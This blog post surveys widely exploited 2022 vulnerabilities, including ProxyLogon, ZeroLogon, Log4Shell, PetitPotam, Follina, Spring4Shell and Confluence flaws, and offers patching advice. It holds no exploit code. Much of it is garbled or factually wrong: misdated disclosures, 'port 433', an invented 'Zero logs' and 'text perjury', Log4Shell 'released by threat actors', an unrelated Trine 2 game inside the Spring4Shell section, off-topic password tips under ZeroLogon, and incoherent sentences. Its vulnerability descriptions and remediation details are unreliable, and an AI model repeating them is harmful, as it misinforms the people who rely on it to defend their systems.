What will be the most dangerous vulnerabilities exploited in 2022? It’s hard to say for sure, but we can make some educated guesses based on current trends and history.
This blog post will examine some of the most dangerous ones and explain why they’re so risky. We’ll also offer some advice on how to protect yourself against them. So read on to learn more.
Vulnerability Management and exploited vulnerabilities catalog
Many organizations are struggling with patch management. On average, it takes an organization 60 days to patch a critical vulnerability; less dangerous ones can take longer if addressed.
Last year over half the identified system vulnerabilities were from two years ago as such many cyber threat actors will go after older technology in 2022 because those bugs still have ripe targets waiting for them online, so there’s money left on the table when exploiting these flaws rather than writing off new software entirely as hopelessly outdated before launching attacks against its users.
Vulnerability Management challenges
But why does it take so long for organizations to patch their systems? It’s often a combination of budget, technology complexity, and human error.
While some may argue that throwing money at the problem will solve it, there are still practical limitations to consider, like utilizing outdated hardware or software that can’t be upgraded easily.
And while there are certainly cases where human error plays a role in slow patching, it’s important to note that many times it’s due to the sheer complexity of managing multiple patches across various technology systems and ensuring they don’t cause unexpected disruptions or failures.
Here are the most dangerous known exploited vulnerabilities in 2022
(CVE-2021-26855) ProxyLogon
The ProxyLogon bug has been exploited by hackers to avoid authentication and therefore imitate an administrator.
Due to the absence of updates for interior infrastructures, this stays one if not the most manipulated weaknesses in 2022. The vulnerability was first published back on August 2021 when it received attention from the DEVCORE team, who then added them as part of their automatic tools kits, which are used across many threat actors today because these bugs can be easily abused without requiring user interaction like port 433 does, giving access to everything sideways of activity diligence, access, and faraway manipulation, etc.
(CVE-2020-1472) ZeroLogon
The ZeroLogon vulnerability, also known as CVE 2020-1472, has been around since August last year. It allows an adversary to connect with the MS Netlogon remote protocol without ever being challenged for credentials by credentials using NTLM logons instead. This is why you should always make sure your passwords are unique.
Giving them full access to any system they want. Microsoft Defender detects these attacks now, so keep those eyes open when browsing online.
In addition, there’s another thing called “Zero logs.” It means “Zero Login,” as lately, we’ve seen more websites exploited through adverts or attachments, sometimes even both at once.
So be sure to have a different password for all your accounts and enable 2-factor authentication wherever possible. This will significantly reduce the likelihood of someone gaining access to your sensitive information.
But wait, there’s more. Changing your passwords regularly is also essential because even if someone doesn’t gain access to your account with a current password, they could crack it with enough time and computing power.
So, keep those passwords fresh. And make sure to use a mix of numbers, symbols, and upper and lowercase letters to make them harder to crack.
(CVE-2021-44228) Log4Shell remote code execution
This year, Log4shell is causing chaos. It was released in late 2021 by threat actors who explore it heavily to find remote code execution conditions where they can download malicious payloads onto your server side. This vulnerability affected the popular Apache Java logging library.
An online report discussed how cybercriminals use remote code execution vulnerabilities to gain complete control over systems. We also learned about their tactics for installing cryptocurrency mining software.
More recently, Cobalt Strike, which helps them steal user credentials while staying anonymous by using malware or tricks like watering down pages loading in your browser before infection (a technique called “text perjury”).
The last stage of malicious activity includes ransomware deployment, where hackers hope victims will be unable enough without access controls set up correctly.
If not, they’ll have no choice but to release sensitive data onto dangerous websites, giving away all markers associated with past activity and allowing for potential identity theft.
VMware vSphere client (CVE-2021-21972)
The VMware vSphere client (HTML5) has recently patched a remote code execution vulnerability that can be exploited by an insider risk to escalate rights and conduct controls on the 443 port.
This is one of many potential points for access to your entire infrastructure. You must know how this affects IT operations and day-to-day business activities such as web browsing or emailing friends outside work.
(CVE-2021-36942) PetitPotam
The PetitPotam weakness lives in the Windows database and servers where AD CS has not been configured with defense against NTLM relay attacks.
A threat actor can assume control over a domain controller by pushing it to affirm and accept links from him, even if they’re UNCLASSIFIED information. This means that all data sent during this time will be encrypted using a decryption key controlled only by them and no one else.
To remediate these issues, you need either install KB5005413 or make certain services allowing authentication utilizing EPA , use some sortable vector like password sanity checks before accepting connection requests, or disable NTLM altogether if it’s not necessary for your organization.
As always, keep up to date with the latest patches and fixes from Microsoft and follow best practices to prevent these attacks from happening in the first place.
Follina CVE-2022-30190 remote code execution vulnerability
Follina is a remote code execution vulnerability that saw heavy exploitation in 2022. It affects Microsoft’s Support Diagnostic Tool (MSDT) and can be accessed through malicious documents linked by the company’s URL handlers.
These allow for launching an executable with administrator privileges on targeted systems, allowing hackers to achieve full system compromise.
ICMAD CVE 2022-22536
Internet Communication Manager at SAP has been discovered vulnerable and achieved a ten on the CVSS 3.1 scale, which permits HTTPS request smuggling where data controlled by an attacker can be added at your system’s startup under user identity breaking confidentiality, availability, and integrity.
Cybersecurity experts recently learned that some users might experience an issue with their browsers when visiting certain websites. Reading through reports, we’ve found more information regarding this particular bug. Franco Yelo and Skyline discovered that the SAP Internet Communication Manager (ICM) is vulnerable to HTTPS request smuggling, where attacker-controlled data can be added at startup under user identity. This breaks the confidentiality, availability, and integrity of your system.
Spring4Shell CVE-2022-22965
Attackers can exploit these critical vulnerabilities by using specially crafted SpELs as a routing expression, resulting in RCE.
As seen with the recent Trine 2 game that was released early on Steam before its official debut (and quickly pulled), there’s always some vulnerability waiting around every corner, including one found within Spring4Shell, at least according to certifications obtained via CVSS scoring system 9/10ths max severity which ranks it eight out 10th in terms of exploitability and impact.
To protect your systems, the latest version – 1.0.6-SNAPSHOT, has disabled evaluation by default to prevent any malicious SpEL expressions from being executed within the routing process. Keeping your software updated with the latest versions and patches is best to avoid potential attacks.
CVE-2022-22947
It’s another vulnerability related to the Spring vulnerabilities that have scored 10s on the CVSS. This new exploit, CVE 2022-22947, execute arbitrary code injections resulting in a total compromise of confidentiality, availability, and integrity from vulnerable versions of SCG when it is publicly accessible; that’s bad news for anyone who uses this software.
CVE-2022-26134
Vulnerabilities found in the Atlassian Confluence allow unauthenticated users to achieve RCE. These vulnerabilities are rated nine on the CVSS scale and were frequently exploited by cybercriminals who installed crypto miners, web shells, or malware onto vulnerable systems with this knowledge gap vulnerability (CVE-2022).
An OGNL injection allowed access that wasn’t intended when it came time to exploit these issues; however, an additional problem was discovered, hardcoded credentials that malicious actors could use once they knew where you’d put them: accessible via Twitter account info leak or through the installation of a backdoor.
To protect against these issues, it’s essential to update to the latest version of Confluence (6.13.5 at the time of writing) and implement appropriate access control policies to limit who can perform administrative tasks on your server.
Regularly monitoring logs for unexpected behavior or network traffic can also help catch malicious activity early on.
Remember to keep your software up-to-date and practice good security hygiene to protect yourself against threats.
CVE-2021-26084
The Confluence Wiki-style service is widely deployed in enterprise environments and actively exploited by an unauthenticated user since it can be accessed without permission.
Confluences’ security weakness allows anyone who knows how to navigate their systems, even if they don’t have permissions or aren’t logged on as root, i.e., “someone else” (such as malware) could exploit this vulnerability through direct network access from outside the firewall where there may not necessarily need any special requirements beyond being able to connect directly with services running at localhost.
This means that every application utilizing WebSockets might suddenly become risky due to careful consideration about which ones meet the appropriate safety level.
To address this same vulnerability, the Confluence team released a patch update, but it’s important to note that you must upgrade your Confluence instance for the fix to take effect.
Additionally, suppose you have doubts about how secure your current setup may be. In that case, it’s always best to consult with a professional IT team or service provider to ensure the integrity and safety of your network.
As always, staying up-to-date on the latest security updates for all software in your organization is crucial; proactive measures can save a lot of headaches and potential damage down the road.
Conclusion
So, what should you do to stay safe? Check out our website for more information on the most dangerousvulnerabilities exploited in 2022 and how you can protect yourself.
We’ll keep you up-to-date on all the latest cybersecurity news and information, so you can rest easy knowing that your data is safe.
And remember, prevention is always better than cure, so start implementing some tips we’ve shared today to help secure your online presence. Thanks for reading.
